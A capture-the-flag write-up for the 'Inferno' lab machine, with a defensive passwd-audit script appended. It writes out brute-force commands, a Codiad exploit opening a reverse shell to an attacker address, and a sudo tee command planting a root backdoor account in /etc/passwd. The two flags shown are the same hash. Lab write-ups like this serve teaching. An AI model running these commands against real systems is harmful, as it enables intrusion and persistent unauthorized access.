Last updated: 15 Apr 24 09:31:04 (UTC)
Write-Up Inferno
Inferno
By Lawcky 01/01/2024
Introduction
Real Life machine vs CTF
Difficulty: easy-medium
Additional info:
Name: Inferno: 1.1
Release date: 6 Dec 2020
Author: mindsflee
Series: Inferno
|NOTE| we won't copy all the scans here as they would be far too voluminous; click here to see them
In this write-up
- hydra
- ffuf
- tee
- python
- nmap
Write-Up
first approach
the web page is empty
ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.10/FUZZ
found 192.168.1.10/inferno with a password login
hydra -l admin -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt 192.168.1.10 http-get /inferno/ -I
admin:dante1
it's a Codiad ==> https://www.exploit-db.com/exploits/49705
wget https://www.exploit-db.com/exploits/49705
python3 codiad.py http://192.168.1.10 admin dante1 192.168.1.253 1234
did not work
python /snap/searchsploit/399/opt/exploitdb/exploits/multiple/webapps/49705.py http://admin:dante1@192.168.1.10/inferno/ admin dante1 192.168.1.253 1234 linux
this way works too and gives us a connection
we now know about the dante user for ssh
hydra -l dante -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt ssh://192.168.1.10/
while this runs, we look around for interesting files.
there's a hidden file in the Download dir of dante
cat /home/dante/Download/.download.dat
it's hex-encoded ASCII; once decoded, the end reads: dante:V1rg1l10h3lpm3 <== ssh password
77f6f3c544ec0811e2d1243e2e0d1835
first flag found, the next one is the root user
Privilege Escalation
sudo -l
===> https://gtfobins.github.io/gtfobins/tee/
with this we can create a root user by appending it directly to the /etc/passwd file
openssl passwd -1
echo 'pwn:$1$L8NTO40O$xtQpcAcFWpkcKkQf8KxAM:0:0:pwned:/root:/bin/bash' | sudo tee -a /etc/passwd
it worked
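From the defender's side, the entry appended above is easy to spot: a second UID 0 account whose password hash sits in /etc/passwd instead of /etc/shadow. The following audit script is an added example (not part of the original write-up or the box) that parses /etc/passwd-style content and flags exactly that; the sample content is constructed here so it runs offline.

```python
import sys

# Constructed sample: a normal passwd file with the "pwn" line from the write-up appended.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
dante:x:1000:1000:dante:/home/dante:/bin/bash
pwn:$1$L8NTO40O$xtQpcAcFWpkcKkQf8KxAM:0:0:pwned:/root:/bin/bash
"""


def audit_passwd(text):
    """Return a list of (username, reason) findings for suspicious passwd entries."""
    findings = []
    seen_names = set()
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry (expected 7 colon-separated fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen_names:
            findings.append((name, "duplicate username"))
        seen_names.add(name)
        if not uid.isdigit():
            findings.append((name, "non-numeric UID"))
            continue
        # Any UID 0 account other than root is a root-equivalent backdoor.
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        # "x" defers to /etc/shadow; "*" and "!..." are locked. Anything else is a
        # hash stored in the world-readable file, or an empty field (no password).
        if pw == "":
            findings.append((name, "empty password field (no password required)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((name, "password hash stored directly in /etc/passwd"))
    return findings


if __name__ == "__main__":
    # Audit a real file when a path is given, otherwise the constructed sample.
    content = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for user, reason in audit_passwd(content):
        print(f"{user}: {reason}")
```

Running it against the sample reports the pwn account twice (extra UID 0, hash in /etc/passwd) and nothing for root, daemon or dante.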
77f6f3c544ec0811e2d1243e2e0d1835
second flag found!